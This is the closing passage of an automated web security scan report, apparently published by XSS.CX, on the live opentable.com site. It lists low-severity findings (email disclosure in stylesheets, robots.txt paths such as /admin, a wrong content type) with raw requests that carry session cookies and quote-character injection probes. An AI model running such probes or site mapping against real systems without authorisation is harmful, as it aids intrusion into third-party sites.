PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:57:55 GMT

...button.findTable{border:0;cursor:pointer;font-weight:bold;padding:0 8px 0 0;text-align:center;background:url("/img/buttonsNew/primary_button_on_right.png") no-repeat right;font-size:12px;}button.fi
...[SNIP]...

8.182. http://www.opentable.com/styles/home.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/home.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/home.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 7256
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:06 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:57:42 GMT

...#TopNav{border-bottom:none;}a.mainmarket:link,a.mainmarket:visited,a.mainmarket:hover,a.mainmarket:active,a.mainmarket.wider:link,a.mainmarket.wider:visited,a.mainmarket.wider:hover,a.mainmarket.wi
...[SNIP]...

8.183. http://www.opentable.com/styles/interim.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/interim.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/interim.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 553
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:06 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:45 GMT

... .InterimWrap{width:100%;height:100%;}.InterimContainer{position:absolute;top:50%;left:0;width:100%;height:1px;overflow:visible;}.InterimContentDisplay{width:550px;height:200px;margin-left:-275px;p
...[SNIP]...

8.184. http://www.opentable.com/styles/iphone.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/iphone.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/iphone.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 212
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:06 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:17 GMT

... #TopNav #TopText #TopNav_lblTopText{font-size:98%!important;}h2.featuredHeader{font-size:70%!important;}#lblMakeReservation.lblMakeReservation,#lblFreeInstantConfirmed.lblFreeInstantConfirmed{font
...[SNIP]...

8.185. http://www.opentable.com/styles/ot_style123.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/ot_style123.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/ot_style123.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 17770
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:08 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:57:55 GMT

body{background-color:#867F75;text-align:center;margin-top:20px;font-family:Verdana,Arial,Sans-Serif;}td{font-size:13px;color:#5B4B3E;}td a,a:visited{text-decoration:underline;font-size:13px;}td a:hov
...[SNIP]...

8.186. http://www.opentable.com/styles/plainPages.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/plainPages.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/plainPages.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen'?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; s_cc=true; s_nr=1317646516907-New; s_sq=%5B%5BB%5D%5D; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a55%3a22&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153"&p1=117&rr1=200&rr2=200; pgseq="

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 2640
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:10 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-08
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:20-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:56:41 GMT

... #TopNav{margin:0 0 0 0!important;}#Global{margin-top:20px;}.innerWrapper{margin-top:0;background-color:#fefcf7;}#infoPages{float:left;text-align:left;margin:15px 30px 0 30px;padding:0;display:bloc
...[SNIP]...

8.187. http://www.opentable.com/styles/searchModule.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/searchModule.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/searchModule.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 2604
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:12 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:57:48 GMT

... #imageCal table{font-size:12px;width:150px;font-family:arial;font-weight:bold;background:#FFF;}#imageCal td{padding:0;text-align:center;}a.clickableDays,a:hover.clickableDays,a:visited.clickableDa
...[SNIP]...

8.188. http://www.opentable.com/styles/thickbox.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/thickbox.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/thickbox.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 2614
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:14 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:57:43 GMT

#TB_window{font:12px Arial,Helvetica,sans-serif;color:#322B22;}#TB_secondLine{font:10px Arial,Helvetica,sans-serif;color:#666;}#TB_overlay{position:fixed;z-index:100;top:0;left:0;height:100%;width:100
...[SNIP]...

8.189. http://www.opentable.com/styles/white/OpenTablesAB.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/white/OpenTablesAB.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/white/OpenTablesAB.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 17362
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:16 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:52 GMT

... #ResultsMainModule{margin:0 0 0 10px;padding:0;float:left;display:block;text-align:left;width:453px;position:relative;}.restImage{width:245px!important;height:265px!important;float:left;margin:25p
...[SNIP]...

8.190. http://www.opentable.com/styles/white/topandbot.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/white/topandbot.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/white/topandbot.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 4840
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:18 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-04
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:45 GMT

... body{font-family:Verdana,Arial,Hevetica,Sans-Serif;color:#42382c;}#SearchForm{width:760px;}#Global{margin:0 auto;width:760px;}.innerWrapper{margin:15px auto;float:left;padding-bottom:25px;backgrou
...[SNIP]...

8.191. http://www.opentable.com/styles/white/topandbot_old.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/white/topandbot_old.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/white/topandbot_old.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 10005
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:18 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-03
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2009.12.01T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:55:04 GMT

...body{background-color:#fff;font-family:Verdana,Arial,sans-serif;text-align:center;margin:0;background-position:center;}.divider{color:#666;float:left;clear:both;background-color:#666;width:978px;he
...[SNIP]...

8.192. http://www.opentable.com/styles/wick002.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/wick002.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/wick002.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 628
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:14 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:57:53 GMT

.wickWrapper{position:relative;float:left;z-index:1;}.floaterDiv{position:absolute;z-index:100;top:0;left:0;display:none;padding:0;margin:22px 0 0 0;}.floater td{font-family:Verdana,Arial,sans-serif;b
...[SNIP]...

8.193. http://www.opentable.com/styles/wick003.css  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /styles/wick003.css

Issue detail

The following email address was disclosed in the response:

Request

GET /styles/wick003.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 753
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:14 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:51 GMT

.floater{position:absolute;z-index:100!important;top:81px!important;left:15px!important;display:none;padding:2px;border:1px solid #a49e95;background:#fff;-moz-border-radius:.4em;-webkit-border-radius:
...[SNIP]...

9. Robots.txt file  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /frontdoor/default.aspx

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: www.opentable.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 12:53:35 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
Etag:
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: txt; charset=utf-8
Content-Length: 1041

# robots.txt for http://www.opentable.com/

User-agent: *
Disallow: /_LBStatus
Disallow: /admin
Disallow: /aspnet_client
Disallow: /bin/
Disallow: /Components
Allow: /img/restimages
Allow: /i
...[SNIP]...

10. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.opentable.com
Path:   /httphandlers/MetroData.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /httphandlers/MetroData.aspx?m=4&mc=US&v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:58 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 13631

var OTLOOKUP_METROS = new Hash({45:[45,'Alabama',[33.4886090,-86.7568810]],331:[331,'Amsterdam',[52.3765710,4.9071000]],212:[212,'Anchorage',[61.2175750,-149.8877980]],95:[95,'Arkansas',[35.2142097,-9
...[SNIP]...

Report generated by XSS.CX at Mon Oct 03 09:11:44 CDT 2011.